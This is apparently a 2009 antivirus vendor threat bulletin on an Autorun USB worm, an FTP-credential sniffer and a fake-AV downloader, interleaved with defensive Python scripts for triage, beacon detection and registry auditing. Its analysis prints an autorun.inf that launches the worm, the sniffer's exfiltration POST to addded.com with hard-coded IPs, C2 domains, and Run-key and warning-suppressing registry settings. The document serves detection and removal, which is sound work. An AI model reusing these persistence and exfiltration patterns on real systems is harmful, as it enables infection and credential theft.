Threat Spotlight

For the week of 28 Sep 2009
Threat 1

Worm exploits Windows' Autorun feature to infect removable devices

Threat Name:

Malware: Mal/AutoInf-A

Users at Risk:

Windows users with removable storage devices

Also Known As:

  • McAfee: Generic!atr

Removal Instructions:

If you believe you have been infected, please follow these instructions for removing generically detected files.

About:

Mal/AutoInf-A is a malicious file usually found on USB drives or other removable storage devices, such as iPods or memory cards for cameras. The presence of Mal/AutoInf-A is indicative of a worm infection, since worms are the most common means for this malware to spread from one computer to another.

To infect a new computer, first an uninfected removable storage device needs to be plugged into a machine that is infected with both Mal/AutoInf-A and a worm. The worm creates a copy of Mal/AutoInf-A on the device, usually in a file named autorun.inf. This file will usually be marked as hidden, system and read-only in order to protect it from easy detection and deletion.

After copying malware to the removable device, the worm will then create a copy of itself on the device.

When the infected removable device is connected to a computer with the 'auto insert notification' feature enabled—as it is by default—Windows will search the device's root directory for the presence of an autorun.inf file. If present, Windows then proceeds to read the file and execute its instructions. In the case of Mal/AutoInf-A, this will usually be:

[AutoRun]
open=worm.exe
shellexecute=worm.exe
shell\Auto\command=worm.exe
shell=Auto

—where "worm.exe" is the name of the specific malware in question.

This is how the worm takes advantage of the Windows Autorun feature to ensure it will execute whenever the infected device connects to a new computer.

Once the worm starts running, it copies itself to Windows system folders. When a new removable storage device connects to the computer, the worm replicates itself in the method described above.

To remove all of the components of a Mal/AutoInf-A infection effectively, you need to remove both the Mal/AutoInf-A file and the associated executable that created it. Removing the Mal/AutoInf-A file alone will not resolve the infection.
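The autorun.inf layout described above is simple enough to triage by hand, but on a drive with a hidden, system, read-only file it helps to have a script that reads the [AutoRun] section and names the executable each launch vector points at, which is exactly the "associated executable" the removal paragraph says must also be deleted. The following is an added example, not Sophos code or part of the original spotlight; the sample INI text is constructed from the snippet above, the attribute constants mirror the Windows FILE_ATTRIBUTE_* values, and triage_drive() is an assumed helper for reading a mounted device's root.

```python
"""Triage an autorun.inf found in the root of a removable device.

Added example (not Sophos code): parses the [AutoRun] section as laid out in
the threat description and reports which executables Windows would launch on
insertion or when the drive is opened, plus whether the file carries the
hidden + system + read-only attribute combination the worm uses.
"""
import os
import stat

# Constructed sample modelled on the snippet in the threat description.
SAMPLE_AUTORUN = """[AutoRun]
open=worm.exe
shellexecute=worm.exe
shell\\Auto\\command=worm.exe
shell=Auto
"""

# Windows FILE_ATTRIBUTE_* bits; fall back to the documented values if the
# running Python's stat module does not expose them.
ATTR_READONLY = getattr(stat, "FILE_ATTRIBUTE_READONLY", 0x1)
ATTR_HIDDEN = getattr(stat, "FILE_ATTRIBUTE_HIDDEN", 0x2)
ATTR_SYSTEM = getattr(stat, "FILE_ATTRIBUTE_SYSTEM", 0x4)
STEALTH_ATTRS = ATTR_READONLY | ATTR_HIDDEN | ATTR_SYSTEM


def parse_autorun(text):
    """Return key/value pairs of the [AutoRun] section (section name matched
    case-insensitively, keys kept verbatim, later duplicates win)."""
    entries = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip()] = value.strip()
    return entries


def launch_targets(entries):
    """Map each launch vector to the command it runs.

    'open' and 'shellexecute' fire on insertion when auto insert notification
    is enabled; shell\\<verb>\\command fires for that context-menu verb, and
    'shell=<verb>' makes that verb the default double-click action."""
    targets = {}
    default_verb = None
    for key, value in entries.items():
        lk = key.lower()
        if lk in ("open", "shellexecute"):
            targets[lk] = value
        elif lk == "shell":
            default_verb = value.lower()
        elif lk.startswith("shell\\") and lk.endswith("\\command"):
            verb = lk.split("\\")[1]
            targets["verb:" + verb] = value
    if default_verb is not None and "verb:" + default_verb in targets:
        targets["default-double-click"] = targets["verb:" + default_verb]
    return targets


def triage(text, attrs=None):
    """Summarise an autorun.inf: referenced executables, whether it autostarts
    on insertion, and whether attrs shows the hidden+system+read-only combo."""
    targets = launch_targets(parse_autorun(text))
    return {
        "targets": targets,
        "executables": sorted({v.split()[0] for v in targets.values()}),
        "autostart_on_insert": any(k in targets for k in ("open", "shellexecute")),
        "stealth_attributes": attrs is not None and (attrs & STEALTH_ATTRS) == STEALTH_ATTRS,
    }


def triage_drive(root):
    """Assumed helper: read <root>/autorun.inf if present. The attribute check
    is meaningful on Windows, where st_file_attributes is populated."""
    path = os.path.join(root, "autorun.inf")
    if not os.path.isfile(path):
        return None
    attrs = getattr(os.stat(path), "st_file_attributes", None)
    with open(path, "r", errors="replace") as fh:
        return triage(fh.read(), attrs)


if __name__ == "__main__":
    print(triage(SAMPLE_AUTORUN, STEALTH_ATTRS))
```

Run against a mounted device with triage_drive(r"E:\"); every executable the report names should be removed together with the autorun.inf itself. The Autorun behaviour the worm relies on can also be switched off policy-wide with the NoDriveTypeAutoRun value under HKCU or HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer (0xFF disables it for all drive types).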

Threat 2

Network traffic sniffer steals your FTP credentials

Threat Name:

Trojan: Troj/Sniffer-R

Users at Risk:

Windows users

Removal Instructions:

Please follow these instructions for removing Trojans.

About:

Troj/Sniffer-R is a malicious file that "sniffs" FTP credentials, meaning it monitors users' network traffic to steal and report users' FTP credentials to a remote site. This Trojan is somewhat unusual in that it only sniffs plain-text FTP traffic via port 21—secure FTP (SFTP) would not be sniffed.

This Trojan is often dropped to the following location:

<Program Files>\Common Files\file.exe

and copies itself to one of the following locations:

<Application Data>\Microsoft\Windows\winlogon.exe
C:\Program Files\Microsoft\winlogon.exe

Troj/Sniffer-R then creates the following registry entry so that it runs automatically on startup:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Microsoft Windows logon process
<path to Trojan>

After sniffing network traffic for FTP credentials, the Trojan pushes the stolen information to these hard-coded IP addresses:

"91.203.93.23"
"70.87.136.2"

—which, at the time of original analysis, resolved to the known malicious site "addded.com," though it now resides at different IP addresses (see note below). This malicious site is actually used in the POST request:

POST /cgi-bin/check.pl HTTP/1.1
Host: addded.com
Content-Length: %d
Connection: close
%s

—where the variables %d and %s are filled in when the data is pushed.

Troj/Sniffer-R is sometimes dropped by Fake AV, Troj/FakeAv-AAL in particular.

The packer code used to obfuscate Troj/Sniffer-R has much in common with the TDSS family of malware. Sophos detects variants of this file as Mal/TDSSPack-Q and Mal/TDSSPack-R. The code-obscuring characteristics include fake exports that are placed randomly in the middle of other functions, as well as extreme repeated use of extended operations—in this case, floating point operations using XMM registers.

Note: As with many Fake AV pushers, the malicious domain to record sniffed credentials has already shifted the IP addresses for "addded.com." Notably, the time to live (TTL) for the DNS record on "addded.com" is short—only 60 seconds. By comparison, a common TTL value is 86400 seconds, or 24 hours.
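The hard-coded POST request and IP addresses above, together with the 60-second TTL noted for "addded.com," give a defender two detection hooks: a request-shape match in proxy or IDS logs and a low-TTL heuristic over DNS answers. The following is an added example, not Sophos code or part of the original spotlight; the indicators come from the description above, the sample requests and DNS answers are constructed, and the 300-second TTL threshold is an assumed value chosen for illustration.

```python
"""Flag the Troj/Sniffer-R exfiltration POST in HTTP request logs and spot
the short-TTL DNS behaviour noted for addded.com.

Added example (not Sophos code). Indicators are taken from the threat
description; sample traffic and DNS answers below are constructed.
"""
import re

# Indicators from the description above (%d/%s are filled in at run time).
BEACON_HOST = "addded.com"
BEACON_PATH = "/cgi-bin/check.pl"
BEACON_IPS = {"91.203.93.23", "70.87.136.2"}

# Constructed sample traffic as (destination IP, raw request):
# one Sniffer-R beacon, one benign POST, one plain GET to the listed host.
SAMPLE_REQUESTS = [
    ("91.203.93.23",
     "POST /cgi-bin/check.pl HTTP/1.1\r\nHost: addded.com\r\n"
     "Content-Length: 20\r\nConnection: close\r\n\r\nu=ftpuser&p=REDACTED"),
    ("203.0.113.10",
     "POST /login HTTP/1.1\r\nHost: intranet.example\r\n"
     "Content-Length: 5\r\n\r\nhello"),
    ("70.87.136.2", "GET / HTTP/1.1\r\nHost: addded.com\r\n\r\n"),
]

# Constructed DNS answers as (name, TTL seconds); 86400 is the common value
# the note cites, 60 is what addded.com was observed to use.
SAMPLE_DNS = [("addded.com", 60), ("www.example.com", 86400), ("cdn.example.net", 300)]


def parse_request(raw):
    """Split a raw HTTP/1.x request into method, path, headers and body.
    Returns None when the request line is malformed."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    m = re.match(r"(\S+)\s+(\S+)\s+HTTP/\d\.\d$", lines[0])
    if not m:
        return None
    headers = {}
    for h in lines[1:]:
        name, sep, val = h.partition(":")
        if sep:
            headers[name.strip().lower()] = val.strip()
    return {"method": m.group(1), "path": m.group(2), "headers": headers, "body": body}


def classify(dst_ip, raw):
    """'sniffer-r-beacon' for the exact POST shape to the listed host/IPs,
    'ioc-contact' for any other request touching them, else None."""
    req = parse_request(raw)
    if req is None:
        return None
    host = req["headers"].get("host", "").split(":")[0].lower()
    touches_ioc = host == BEACON_HOST or dst_ip in BEACON_IPS
    if touches_ioc and req["method"] == "POST" and req["path"] == BEACON_PATH:
        return "sniffer-r-beacon"
    return "ioc-contact" if touches_ioc else None


def scan(traffic):
    """Return (destination IP, label) for every request that matches."""
    hits = []
    for dst_ip, raw in traffic:
        label = classify(dst_ip, raw)
        if label:
            hits.append((dst_ip, label))
    return hits


def low_ttl_names(answers, threshold=300):
    """Names answered with a TTL below threshold, the fast-moving hosting
    pattern the note describes (60 s against a typical 86400 s)."""
    return [name for name, ttl in answers if ttl < threshold]


if __name__ == "__main__":
    print(scan(SAMPLE_REQUESTS))
    print(low_ttl_names(SAMPLE_DNS))
```

Because the note says the domain has already moved to other IP addresses, the host-name match and the TTL heuristic are the parts of this check that stay useful once the listed IPs go stale; the plaintext FTP exposure itself is addressed by moving users off unencrypted port 21 FTP.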

Threat 3

Email Trojan infects registry to pile on malware

Threat Name:

Trojan: Troj/Dldr-BL

Users at Risk:

Windows users

Also Known As:

  • Kaspersky: Backdoor.Win32.UltimateDefender.yw
  • Avira: TR/Dldr.FraudLoad.51200
  • Symantec: Trojan.Virantix.C
  • Trend: TROJ_FAKEAV.CVA
  • Microsoft: Trojan:Win32/Wantvi.I

Removal Instructions:

Please follow these instructions for removing Trojans.

About:

Troj/Dldr-BL includes functionality to access the internet and communicate with the following remote servers via HTTP:

uplaserdunavats.com
opolertionfer.com
nuherfodaverta.com
gumertagionader.com
celiminerkariota.com

When first run, Troj/Dldr-BL fires on Host Intrusion Prevention System (HIPS) detection "HIPS/FileMod-004" and "HIPS/FileMod-007," and then copies itself to the following locations:

<Windows>\braviax.exe
<System>\braviax.exe

When those executables are run, the following files are created and can be safely deleted:

<User>\Application Data\Microsoft\Internet Explorer\Quick Launch\AntivirusPro_2010.lnk
<Desktop>\AntivirusPro_2010.lnk
<Start Menu\Programs>\AntivirusPro_2010\AntivirusPro_2010.lnk
<Start Menu\Programs>\AntivirusPro_2010\Uninstall.lnk
<Program Files>\AntivirusPro_2010\Microsoft.VC80.CRT\msvcm80.dll
<Program Files>\AntivirusPro_2010\Microsoft.VC80.CRT\msvcp80.dll
<Program Files>\AntivirusPro_2010\Microsoft.VC80.CRT\msvcr80.dll
<Program Files>\AntivirusPro_2010\pthreadVC2.dll

The Trojan also creates these malware files:

<Program Files>\AntivirusPro_2010\AntivirusPro_2010.exe (detected as Mal/EncPk-IF)
<Program Files>\AntivirusPro_2010\AVEngn.dll (detected as Mal/EncPk-IF)
<Program Files>\AntivirusPro_2010\htmlayout.dll (detected as Mal/EncPk-IF)
<Program Files>\AntivirusPro_2010\Uninstall.exe (detected as Mal/EncPk-IF)
<Program Files>\AntivirusPro_2010\wscui.cpl (detected as Mal/EncPk-IF)
<Windows>\cru629.dat (detected as Mal/TibsPak, Mal/EncPk-BB and Mal/EncPk-A)
<System>\cru629.dat (detected as Mal/TibsPak, Mal/EncPk-BB and Mal/EncPk-A)
<System>\wisdstr.exe (detected as Mal/EncPk-IF)
<System>\dllcache\figaro.sys (detected as Mal/FakeAle-C)

The following registry entries are created to run AntivirusPro_2010.exe and braviax.exe on startup:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run braviax
<System>\braviax.exe

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run braviax
<System>\braviax.exe

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Antivirus Pro 2010
"<Program Files>\AntivirusPro_2010\AntivirusPro_2010.exe" /hide

Registry entries are then set as follows:

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
ForceClassicControlPanel
1

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
LowRiskFileTypes
zip;.rar;.cab;.txt;.exe;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mov;.mp3;.wav

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
SaveZoneInformation
1

HKCU\Software\Microsoft\Internet Explorer\Main
Enable Browser Extensions
yes

HKCU\Software\Microsoft\Internet Explorer\Download
RunInvalidSignatures
1
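Several of the values above do more than persist the malware: they lower the warnings a user would otherwise see when running downloaded executables. The following is an added example, not Sophos code or part of the original spotlight; it audits the three values whose effect on download handling is well known (LowRiskFileTypes, SaveZoneInformation, RunInvalidSignatures) using the key paths exactly as listed above, the "weakened" conditions are my reading of what each value controls, and the observed-value snapshot is constructed to match the listing so the audit runs off Windows.

```python
"""Audit the Explorer/IE policy values Troj/Dldr-BL is described as setting.

Added example (not Sophos code). Key paths and values come from the registry
listing in the threat description; the snapshot below is constructed. On
Windows, read_hkcu_values() reads the live values with winreg.
"""
import sys

ASSOC = r"Software\Microsoft\Windows\CurrentVersion\Policies\Associations"
IE_DOWNLOAD = r"Software\Microsoft\Internet Explorer\Download"

# Executable-type extensions that should never be listed as "low risk".
RISKY_EXTENSIONS = {".exe", ".msi", ".reg", ".cab"}


def _lists_risky_types(value):
    """LowRiskFileTypes is a ';'-separated list of extensions."""
    listed = {e.strip().lower() for e in str(value).split(";")}
    return bool(RISKY_EXTENSIONS & listed)


# (key under HKCU, value name) -> (predicate for a weakened state, why it matters)
CHECKS = {
    (ASSOC, "LowRiskFileTypes"): (
        _lists_risky_types,
        "executable types marked low risk, so no attachment/download warning"),
    (ASSOC, "SaveZoneInformation"): (
        lambda v: v == 1,
        "zone information (Mark-of-the-Web) not preserved on downloaded files"),
    (IE_DOWNLOAD, "RunInvalidSignatures"): (
        lambda v: v == 1,
        "downloads with invalid Authenticode signatures allowed to run"),
}

# Constructed snapshot matching the values in the listing above.
OBSERVED = {
    (ASSOC, "LowRiskFileTypes"):
        "zip;.rar;.cab;.txt;.exe;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mov;.mp3;.wav",
    (ASSOC, "SaveZoneInformation"): 1,
    (IE_DOWNLOAD, "RunInvalidSignatures"): 1,
}


def audit(observed):
    """Return [(key, name, value, reason)] for each value in a weakened state.
    Values absent from the snapshot are treated as default and not flagged."""
    findings = []
    for (key, name), (is_weak, reason) in CHECKS.items():
        if (key, name) in observed and is_weak(observed[(key, name)]):
            findings.append((key, name, observed[(key, name)], reason))
    return findings


def read_hkcu_values():
    """Collect the checked values from the live HKCU hive (Windows only)."""
    if not sys.platform.startswith("win"):
        raise RuntimeError("live registry read requires Windows")
    import winreg
    found = {}
    for key, name in CHECKS:
        try:
            with winreg.OpenKey(winreg.HKEY_CURRENT_USER, key) as k:
                found[(key, name)] = winreg.QueryValueEx(k, name)[0]
        except OSError:
            pass  # key or value absent: default state
    return found


if __name__ == "__main__":
    snapshot = read_hkcu_values() if sys.platform.startswith("win") else OBSERVED
    for key, name, value, reason in audit(snapshot):
        print(f"HKCU\\{key}\\{name} = {value!r}: {reason}")
```

After removing the Trojan's files and Run entries, re-run the audit: a clean profile returns no findings, since these policy values are normally absent unless an administrator set them.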

These registry entries are created under:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AntivirusPro_2010\
HKCU\Software\Microsoft\Security Center\
HKLM\SOFTWARE\AntivirusPro_2010\